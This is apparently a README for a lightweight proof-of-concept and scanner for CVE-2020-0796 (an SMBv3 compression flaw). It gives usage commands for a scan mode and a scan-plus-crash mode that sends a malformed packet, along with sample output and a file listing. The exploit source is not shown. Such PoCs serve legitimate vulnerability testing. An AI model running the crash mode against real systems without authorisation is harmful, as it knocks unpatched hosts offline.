Lightweight PoC and Scanner for CVE-2020-0796 without authentication.# CVE-2020-0796
An even more simple PoC and Scanner for CVE-2020-0796, as it uses static packets. There is a protection to prevent accidental usage on public IPs (don't do that) and an on/off switch to flick crashing. Only requires vanilla Python 3!
Scan mode:
```
python3 poc-and-scan.py 10.0.0.15 N
```
Scan+Crash mode:
```
python3 poc-and-scan.py 10.0.0.15 Y
```
Output:
```
SMB v311 with LZNT1 detected.
Sending malformed packet per user request!
```
## License
Licensed under the WTFPL license.
[4.0K] /data/pocs/e8f82ef19e360e9076083e68d12e30f5879be051
├── [ 484] LICENSE-WTFPL
├── [2.0K] poc-and-scan.py
└── [ 505] README.md
0 directories, 3 files